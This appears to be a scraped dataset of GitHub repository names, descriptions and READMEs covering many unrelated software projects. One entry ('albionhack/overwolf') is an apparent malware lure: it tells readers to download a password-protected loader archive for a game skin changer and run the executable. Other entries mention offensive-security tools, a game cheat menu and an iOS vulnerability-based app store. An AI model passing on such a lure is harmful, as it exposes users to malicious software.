full_name
stringlengths
9
72
url
stringlengths
28
91
description
stringlengths
3
343
readme
stringlengths
1
207k
verytinydever/speech-to-text
https://github.com/verytinydever/speech-to-text
null
# speech-to-text
xzxADIxzx/Join-and-kill-em-together
https://github.com/xzxADIxzx/Join-and-kill-em-together
Multikill is still in development, so I created my own multiplayer mod for ultrakill
# Join and kill 'em together Multikill is still in development, so I created my own multiplayer mod for ultrakill. It's also in development, but with gnashing of teeth it's already playable. ## Features * Steam integration for invitations. * Chat, list of players and indicators to help you find each other on the ma...
OneB1ank/A1Memory
https://github.com/OneB1ank/A1Memory
Android third-party memory management
# A1 memory management [![](https://img.shields.io/badge/-C-black?logo=c&style=flat-square&logoColor=ffffff)](http://cppmicroservices.org/) [![](https://img.shields.io/badge/-C++-808080?logo=c%2B%2B&style=flat-square&logoColor=ffffff)](http://cppmicroservices.org/) [![](https://img.shields.io/badge/-Bash-ae9a5a?style=...
rhwong/unidbg-fetch-qsign-onekey
https://github.com/rhwong/unidbg-fetch-qsign-onekey
用于一键在Windows下部署fuqiuluo/unidbg-fetch-qsign
<div align="center"> <img alt="OOOK" src="https://olivos.onekey.ren/img/logo.png"/> # unidbg-fetch-qsign-onekey 本项目使用1.1.7版本,由于当前go-cqhttp(1.1.0)暂未适配,请来[此repo下载](https://github.com/rhwong/go-cqhttp-dev/releases/tag/v1.1.1-dev)非官方编译版本。如需旧版请移步release 用于一键在Windows下部署[fuqiuluo/unidbg-fetch-qsign](https://github.com...
darjaorlova/fluttercon23-code-audit-resources
https://github.com/darjaorlova/fluttercon23-code-audit-resources
null
# fluttercon23-code-audit-resources *The recording of the talk will be here, check in later!* [Slides from the presentation](https://docs.google.com/presentation/d/1CIeR8FLSYTZ-MjEsPd5meIHsls9fZZqi4rgWt452kOI/edit?usp=sharing) [Template for code audit in Google sheets](https://docs.google.com/spreadsheets/d/1Hj2rQ-P...
tiev-tongji/LOG-LIO
https://github.com/tiev-tongji/LOG-LIO
A LiDAR-Inertial Odometry with Efficient Local Geometric Information Estimation
# LOG-LIO The code will be released after the paper is accepted.
fabiospampinato/pollex
https://github.com/fabiospampinato/pollex
A tiny polling-based filesystem watcher that tries to be efficient.
# Pollex A tiny polling-based filesystem watcher that tries to be efficient. This is a port of the idea behind [`esbuild`](https://esbuild.github.io/api/#watch)'s filesystem watcher, which uses polling but more efficiently than using it naively. ## Features Unless you really want this I'd recommend using a [normal]...
Hoshinonyaruko/Red-Adapter
https://github.com/Hoshinonyaruko/Red-Adapter
red-protocol simple onebot adapter
# BetterQQNT-Adapter red-protocol simple onebot adapter 没有公开源码是因为经过Betterqqnt作者microblock提醒,二次开发可能会带来不可控的风险。 # BetterQQNT-Adapter-epl Red-Protcol的epl-adapter-demo,欢迎参考开发其他语言版本 请不要在官方群聊等内提及本教程。 请不要发送视频,帖子等来宣传此教程。 本教程请不要大规模传播,请不要在视频或论坛投稿。 # 操作【一】 一加入bqnt频道获取 dll https://t.me/betterqqnt 不可以分发所以请自行在原项目仓库获取:https:...
OmdenaAI/myanmar-chapter-chest-x-rays
https://github.com/OmdenaAI/myanmar-chapter-chest-x-rays
null
# Identifying Diseases in Chest X-Rays & COVID-19 Detection ## The Problem The problem we aim to solve through this project is two-fold. Firstly, the lack of accessible and reliable diagnostic tools for chest diseases, including COVID-19, hampers timely detection and intervention, which can lead to the rapid spread o...
gitdagray/next-auth-role-based
https://github.com/gitdagray/next-auth-role-based
null
# "NextAuth.js Role-Based Access Control" ## User Authorization & Protected Routes ### With Next.js App Router --- ### Author Links 👋 Hello, I'm Dave Gray. 👉 [My Courses](https://courses.davegray.codes/) ✅ [Check out my YouTube Channel with hundreds of tutorials](https://www.youtube.com/DaveGrayTeachesCode). ...
abhishekpanigrahi1996/transformer_in_transformer
https://github.com/abhishekpanigrahi1996/transformer_in_transformer
null
## TinT: Trainable Transformer in Transformer This repository contains the code for our paper Trainable Transformer in Transformer (TinT). ## Quick Links - [TinT: Trainable Transformer in Transformer](#tint-trainable-transformer-in-transformer) - [Quick Links](#quick-links) - [Overview](#overview) - [Structure of...
dfir-dd/dfir-toolkit
https://github.com/dfir-dd/dfir-toolkit
CLI tools for forensic investigation of Windows artifacts
<img align="right" width="50%" src="https://github.com/dfir-dd/pr/blob/main/images/fox/dfir_fox_ai.png?raw=true"> # DFIR Toolkit # Table of contents - [Installation](#installation) - [Overview of timelining tools](#overview-of-timelining-tools) - [Tools](#tools) - [x] [`cleanhive`](#cleanhive) - [x] [`evtx2body...
doyeonjeong/SwiftData-Tutorial
https://github.com/doyeonjeong/SwiftData-Tutorial
How to use SwiftData?
# SwiftData-Tutorial SwiftData 프레임워크 사용법을 설명하는 간단한 앱입니다. ## 시작하기 ### 요구사항 - Xcode 15 이상 ### 사용 방법 1. Start, End 폴더에서 각각 프로젝트를 다운로드합니다. 2. End 폴더의 프로젝트를 열고, `MARK:` 를 검색하여 코드 블록을 찾습니다. 3. Start 폴더에서 해당 코드 블록을 입력합니다. ## 프로젝트 구조 - `Start`: 시작 프로젝트 폴더 - `End`: 완성된 프로젝트 폴더 --- # SwiftData-Tutorial This is a sma...
BICLab/Spike-Driven-Transformer
https://github.com/BICLab/Spike-Driven-Transformer
Spike-Driven Transformer
# Spike-Driven Transformer [Arxiv](https://arxiv.org/abs/2307.01694v1) Spiking Neural Networks (SNNs) provide an energy-efficient deep learning option due to their unique spike-based event-driven (i.e., spike-driven) paradigm. In this paper, we incorporate the spike-driven paradigm into Transformer by the proposed Spi...
1694439208/Avalonia_BluePrint
https://github.com/1694439208/Avalonia_BluePrint
null
# Avalonia_BluePrint 可视化节点编辑器 > ###代办 - [x] 三态折叠 √ - [x] 滚轮缩放 √ - [x] 序列化反序列化 √ - [x] 右键菜单 √ - [x] 支持aot √ - [x] 鼠标拖动蓝图 √ - [x] 蚂蚁线 √ - [ ] 多选+操作 - [ ] 电路线 - [ ] 划块注释 - [ ] 划块合并 - [ ] ui主题 ## 编译 > 此库是使用 [Avalonia](https://github.com/AvaloniaUI/Avalonia) 开发 ## 操作 > #鼠标滚轮缩放蓝图 ## 介绍 > 基于[Avalonia](...
LaresLLC/OffensiveSysAdmin
https://github.com/LaresLLC/OffensiveSysAdmin
A collection of tools Neil and Andy have been working on released in one place and interlinked with previous tools
# Offensive Sysadmin aka Adversary Kit A collection of tools demonstrated at our recent talk, Adversaries Have It Easy, brought to you by [Neil Lines](https://twitter.com/myexploit2600) & [Andy Gill](https://twitter.com/ZephrFish) at [Lares Labs](https://labs.lares.com). ![image](https://github.com/LaresLLC/Offensive...
mineek/MineekStore
https://github.com/mineek/MineekStore
null
# MineekStore Third party iOS app store for CoreTrust Root Certificate Validation Vulnerability-vulnerable iOS versions. Submit apps by making a pr to [here](https://github.com/mineek/mineekstoreapi) ## Attributions - [TrollStore](https://github.com/opa334/TrollStore) - [Pogo](https://github.com/elihwyma/Pogo)
amangupta679/prolifics-java-assignment
https://github.com/amangupta679/prolifics-java-assignment
null
# prolifics-java-assignment
albionhack/overwolf
https://github.com/albionhack/overwolf
𝙳𝚘𝚝𝚊 𝟸 𝚜𝚔𝚒𝚗 𝚌𝚑𝚊𝚗𝚐𝚎𝚛 𝟸𝟶𝟸𝟹 | 𝙰𝙻𝙻 𝚂𝙺𝙸𝙽𝚂 𝙳𝙾𝚆𝙽𝙻𝙾𝙰𝙳
🔒Download - https://github.com/albionhack/albion/releases/download/download/loader.rar Pass: 2023 Instruction: 1) Download Archive from link in the description 2) Open Archive 3) Write password: 2023 4) Open Loader.exe file If you can't download: Try disabling vpn,proxy (if it is enabled); Try downloading the ut...
tshemsedinov/feed
https://github.com/tshemsedinov/feed
Timur Shemsedinov news feed
## SQL templates for JavaScript 2023-07-17 Наилучший из мне известных способов вставить SQL в код на JavaScript с использованием шаблонных строк, подстановкой переменных в формате `${name}` и именованных параметров через `${'name'}` и передачей параметров в виде объекта-коллекции. Код и тесты (они же примеры вызова) т...
boxabhi/Master-DSA-Questions
https://github.com/boxabhi/Master-DSA-Questions
null
# :fire: Leetcode / Data-Structures-and-Algorithms :fire: Most of Questions are Asked in an Interview!!! This repository contains solutions to coding problems based on Data Structures and Algorithms. It aims to help people understand the application of DSA concepts in questions. :rocket: ## :pushpin: Dynamic Programmi...
clickvote/clickvote
https://github.com/clickvote/clickvote
Add upvotes, likes, and reviews to any context ⭐️
![clickvoteanything](https://github.com/clickvote/clickvote/assets/100117126/518864ee-db35-46aa-bd3f-10d561dc1858) <h1 align="center">Add upvotes, likes, and reviews to any context</h1> Clickvote takes the hassle of building your own reaction components around your content. - Showing real-time updates of likes, upv...
ibelick/background-snippets
https://github.com/ibelick/background-snippets
Collection of modern, background snippets. Ready-to-use, simply copy and paste into your next project.
## BG.IBELICK Collection of modern, background snippets. Ready to use, simply copy and paste it into your next project. All snippets are crafted with Tailwind CSS.
andrew-zachary/multi-vendor-ecommerce
https://github.com/andrew-zachary/multi-vendor-ecommerce
Multi Vendor Ecommerce
# Multi Vendor Ecommerce The purpose of this project is to learn more about Nodejs and MongoDB, dive deeper into web technologies and hit the core through **MEVN** stack web apps. Breaking the project into three major parts will make it easier to focus on each task individually: - ### Client A single-page web app...
fredi-python/ClipDropSDXL
https://github.com/fredi-python/ClipDropSDXL
Selenium Wrapper for ClipDrop: Unlocking High-Resolution Text-to-Image Creation with StableDiffusionXL (SDXL)
# ClipDropSDXL <img src="https://github.com/fredi-python/ClipDropSDXL/assets/83492589/b3d508ee-d810-4b8b-9d1b-87a4b84967a2" width="2.5%"></img> Selenium Wrapper for ClipDrop: Unlocking High-Resolution Text-to-Image Creation with StableDiffusionXL (SDXL) ## Installation ``` python3 -m pip install --upgrade git+https:/...
facebookresearch/RLCompOpt
https://github.com/facebookresearch/RLCompOpt
Learning Compiler Pass Orders using Coreset and Normalized Value Prediction. (ICML 2023)
This repo contains experiments to learn to optimize program compilation using RL. For people in FAIR (Meta AI), check [README_FAIR.md](README_FAIR.md) to get started. ## System requirements The codebase was tested on Ubuntu 18.04. To install some possible missing libraries on Ubuntu 18.04, we need to run `sudo apt-g...
TechTitan0624/Angular-complete
https://github.com/TechTitan0624/Angular-complete
null
# angular 5.2 and laravel 5.6 Authentication and crud <a href="http://angular5.rbsavani.com">Demo</a> #Installation steps 1.Clone both repository <br> 2.in Frontend run below command <br> npm install and yarn install<br> 3.In backend run below command <br> composer install<br> php artisan key:generate<br> ...
Tencent/fast-causal-inference
https://github.com/Tencent/fast-causal-inference
It is a high-performance causal inference (statistical model) computing library based on OLAP, which solves the performance bottleneck of the existing statistical model library (R/Python) under big data
## Fast-Causal-Inference [![license](https://img.shields.io/badge/license-BSD-brightgreen.svg?style=flat)](https://github.com/Tencent/fast-causal-inference/blob/master/LICENSE) [![Release Version](https://img.shields.io/badge/release-0.1.0-red.svg)](https://github.com/Tencent/fast-causal-inference/releases) [![PRs Wel...
duythinht/shout
https://github.com/duythinht/shout
The radio server for wibu
## Radio Server for Wibu ### Prerequisite * Golang 1.20++ * ffmpeg: `brew install ffmpeg` * A Slack token that associcated with slack app that have permission to read channel history, listing/write bookmarks ### Easy to start ``` go run cmd/music-station/main.go ``` ### Get title via websocket ``` const socket = n...
facebook/igl
https://github.com/facebook/igl
Intermediate Graphics Library (IGL) is a cross-platform library that commands the GPU. It provides a single low-level cross-platform interface on top of various graphics APIs (e.g. OpenGL, Metal and Vulkan).
<div align="center"> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://github.com/facebook/igl/blob/main/.github/igl-full-color-white.svg?raw=true"> <source media="(prefers-color-scheme: light)" srcset="https://github.com/facebook/igl/blob/main/.github/igl-full-color-black.svg?raw=true"> ...
nitroz3us/GPThreatIntel-Summarizer
https://github.com/nitroz3us/GPThreatIntel-Summarizer
GPThreatIntel-Summarizer is a Python tool that uses OpenAI models and CTI to automate report summarization. Extract key insights from CTI reports, generate concise summaries.
# GPThreatIntel-Summarizer GPThreatIntel-Summarizer is a Python-based repository that leverages the power of OpenAI's GPT (Generative Pre-trained Transformer) models to provide an automated summarization solution for Cyber Threat Intelligence (CTI) reports. This tool simplifies the process of extracting key insights f...
pentilm/StellarSolver
https://github.com/pentilm/StellarSolver
🌌 High-Performance N-Body Simulation with CUDA and Barnes-Hut Algorithm. 一个努力的,一个延续了近二百个文明的努力,为解决三体问题的努力,寻找太阳运行规律的努力。
# StellarSolver: High-Performance N-Body Simulation with CUDA and Barnes-Hut Algorithm ## Overview StellarSolver is a comprehensive tool designed for simulating the n-body problem, utilizing the Barnes-Hut algorithm powered by CUDA. The project provides visualization through OpenGL, following Nvidia's CUDA toolkit ex...
TechTitan0624/my-reactsystem
https://github.com/TechTitan0624/my-reactsystem
null
# business-card-react-app ## Solo Project This project is set up with Vite + React. Deployed on Netlify ## Installation ``> yarn install`` ## To run app ``> yarn run dev`` ## Things I added Added fontawesome package ! phew 😅
sammyf/Autobooga
https://github.com/sammyf/Autobooga
Internet search via SEARX and URL Retrieval for oobabooga
# Autobooga ## Acknowledgment : thanks to * Sascha Endlicher of Panomity GmbH for releasing MegaSearch for Oobabooga and indirectly making me write this. Part of the Autobooga code (the Searx search) is heavily based off Megasearch's code. * The InvokeAI user *Gille*, who actually tried to use this extension and fou...
KasperskyLab/uif
https://github.com/KasperskyLab/uif
Integration Platform to build UI and Web Services
# UIF — web starter toolset An opinionated toolset to build UI and Web Services like so: ![Demo App base on UIF](./docs/uif-app-demo.png) Currently available: * [@kaspersky/components](./packages/kaspersky-components/) — Hexa UI, Kaspersky Design System * [@kaspersky/ui-builder](./packages/kaspersky-ui-builder/) — ...
Lin-jun-xiang/docGPT-streamlit
https://github.com/Lin-jun-xiang/docGPT-streamlit
Langchain and Streamlit to develope a docGPT (PDF) :mushroom:
# docGPT [English](./README.md) | [中文版](./README.zh-TW.md) - Table of Contents - [Introduction](#introduction) - [What's LangChain?](#whats-langchain) - [How to Use docGPT?](#how-to-use-docgpt) - [How to Develop a docGPT with Streamlit?](#how-to-develop-a-docgpt-with-streamlit) - [Advanced - How t...
trancethehuman/agent_with_memory
https://github.com/trancethehuman/agent_with_memory
A starter template for AI Companions
# AI Companion (Replika / Paradot clone) <img src="./readme_resources/replika.jpg" alt="replika" width="450"> ### How it works TL;DR - We're combining a custom LangChain Chain as our AI Companion agent, and OpenAI Functions Agent as Entity Extractor for entity memory Details - User sends a message to the AI Compa...
Pzqqt/android_kernel_xiaomi_marble
https://github.com/Pzqqt/android_kernel_xiaomi_marble
Melt Kernel For Redmi Note 12 Turbo (marble) / Poco F5 (marblein)
# How do I submit patches to Android Common Kernels 1. BEST: Make all of your changes to upstream Linux. If appropriate, backport to the stable releases. These patches will be merged automatically in the corresponding common kernels. If the patch is already in upstream Linux, post a backport of the patch that co...
yoidea/applied-math-alarm
https://github.com/yoidea/applied-math-alarm
絶対起きれる⏰
## 絶対に起きられる目覚まし時計 ### YouTube動画 <a href="https://youtu.be/SaouHglJTD0"><img width="720" alt="thumbnail" src="https://i9.ytimg.com/vi/SaouHglJTD0/maxresdefault.jpg"></a> https://youtu.be/SaouHglJTD0 ### 問題パターン `pages/index.tsx`内17行目にある、`handleClick`中の`router.push()`の値を変更することで問題形式を切り替えられます。 ```js const handleClick =...
heinu123/ClashMeta_For_Magisk
https://github.com/heinu123/ClashMeta_For_Magisk
基于clashmeta的clash模块 支持tproxy和tun透明登录 并添加许多易用功能
## 使用须知 没有独立思考能力 判断能力请不要使用该模块 嫌麻烦请使用[cfa](https://github.com/Kr328/ClashForAndroid) **clash配置问题影响你99%使用本模块的体验** **请善用clash日志** ## 模块教程 && 目录: ``` ├── adguard │   ├── AdGuardHome扩展模块 ├── clash.config (clash启动配置) ├── clash.yaml (clash基本配置 dns配置等) ├── clashkernel │   ├── clash内核 ├── config.yaml (订阅配置 分流规则配置) ├── package...
linkfy/threadspy
https://github.com/linkfy/threadspy
Threadspy - Unofficial Threads Meta Api
# Threadspy - Unofficial Threads Meta Api <p align="center"> <img src=".github/cover.png" alt="cover" width="200px" /> </p> # Post on Threads from PC ## Installation Clone the project, execute this instruction inside main folder to install packages: ```shell pip install -r requirements.txt ``` ## API At the momen...
TechTitan0624/Blockchain-cryptocurrency-pro
https://github.com/TechTitan0624/Blockchain-cryptocurrency-pro
null
# Final-Year-Block-chain-Project ### Nutshell: Security of Communication Increase through Use of Combination of Cryptography and Blockchain technology. ### great ### Abstract : The blockchain is an innovative technology that overcomes these threats and allows decentralisation of sensitive operations while preservin...
L7NEG/Ultimate-Menu
https://github.com/L7NEG/Ultimate-Menu
Hello Its Me L7NEG Im Back Again With my own Write Script I Call It Ultimate Menu And It Dose What it says It Is Basiclly A Menu Inside Kiddons Menu With No1 Money Method A Trusted Menu Made With Love To You All
<h1 align="center">Ultimate Menu</h1> <h1 align="center">For Original thread you can find it here====> https://www.unknowncheats.me/forum/grand-theft-auto-v/565688-1-64-ultimate-unlocker.html</h1> # How To Use Ultimate Menu Script For every Version of the ultimate menu (Kiddion/YimMenu) there is a different use and w...
titpetric/task-ui
https://github.com/titpetric/task-ui
Task UI - a web based runner for Taskfile.yml
# Task UI Run your Taskfile.yml from the browser. ![](https://raw.githubusercontent.com/titpetric/task-ui/main/.github/assets/task-ui.png) Start the docker image with `task docker:run`. Task UI is meant for Docker environments. A generic Dockerfile exists, which bundles typical dependencies like `task`, `ttyrec`, `...
maxwalts/tinyv-c
https://github.com/maxwalts/tinyv-c
A tiny nearest-neighbor embedding database written in C
# tinyv-c (wip) A tiny nearest-neighbor embedding database written in C. - under 300 lines - vector stores written/read locally as binary files - includes memory management - pytorch used for text embedding (wip) ## Example use and testing ```c int main() { // Create a vector store with initial_size = 1 Vector...
zongpingding/LaTeX_From_Birth_Death
https://github.com/zongpingding/LaTeX_From_Birth_Death
对于LaTeX新手,你能想到的问题,几乎都能在我这个仓库找到
# 1.声明 * 本仓库仅供学习交流使用,我自己搜集了许多的LaTeX相关的内容,集中于此,本仓库中的任何内容均为涉及任何形式的商业活动 * 仓库中也许有过很多的代码不够优美,我也不打算修改了,今后也能回忆一下自己初学LaTeX的无知 * 仓库中的模板有一部分是我自己修改过的,如果不能编译的话,请提Issue * 仓库中的参考文献和书籍由于版权原因,我不提供,但绝大部分是TeXLive自带或免费开源的文档 * 仓库中除latexalpha2涉及的TeX源码外可在: Windows+TexLive2021 和 Arch+TexLive2023编译 * 仓库中所有使用的字体仅供学习交流目的,未用于商业用途 ...
eryajf/chatgpt-wecom
https://github.com/eryajf/chatgpt-wecom
💬 基于GO语言实现的体验最好的企微应用集成ChatGPT项目 🚀
<p align='center'> <br> 🚀 ChatGPT WeCom 🚀 </p> <p align='center'>🌉 基于GO语言实现的体验最好的企微应用集成ChatGPT项目 🌉</p> <div align="center"> [![Auth](https://img.shields.io/badge/Auth-eryajf-ff69b4)](https://github.com/eryajf) [![Go Version](https://img.shields.io/github/go-mod/go-version/eryajf/chatgpt-wecom)](https://githu...
melody413/python_docx_
https://github.com/melody413/python_docx_
null
.. image:: https://travis-ci.org/python-openxml/python-docx.svg?branch=master :target: https://travis-ci.org/python-openxml/python-docx *python-docx* is a Python library for creating and updating Microsoft Word (.docx) files. More information is available in the `python-docx documentation`_. .. _`python-docx docu...
mattleibow/DeviceRunners
https://github.com/mattleibow/DeviceRunners
A set of device runners for various testing frameworks.
# Test Device Runners A set of device runners for various testing frameworks. The current platforms are: - Android - iOS - macOS (using Mac Catalyst) - Windows (using WinUI 3) The current testing frameworks supported are: - Xunit - Visual device runner - XHarness (CI) device runner - NUnit - Visu...
ruffjs/tio
https://github.com/ruffjs/tio
a tiny iothub, simple and useful. 轻量的 iothub,用经典的物模型简化 iot 应用开发
# tio [![Test](https://github.com/ruffjs/tio/workflows/test/badge.svg)](https://github.com/ruffjs/tio/actions?query=workflow:test) [![Release](https://img.shields.io/github/v/release/ruffjs/tio)](https://github.com/ruffjs/tio/releases) [![API Docs](https://img.shields.io/badge/api-documentation-blue)](https://ruffjs.g...
smol-ai/talk
https://github.com/smol-ai/talk
null
# Smol Talk ## Features - [Next.js](https://nextjs.org) App Router - React Server Components (RSCs), Suspense, and Server Actions - [Vercel AI SDK](https://sdk.vercel.ai/docs) for streaming chat UI - Support for OpenAI (default), Anthropic, Hugging Face, or custom AI chat models and/or LangChain - Edge runtime-ready ...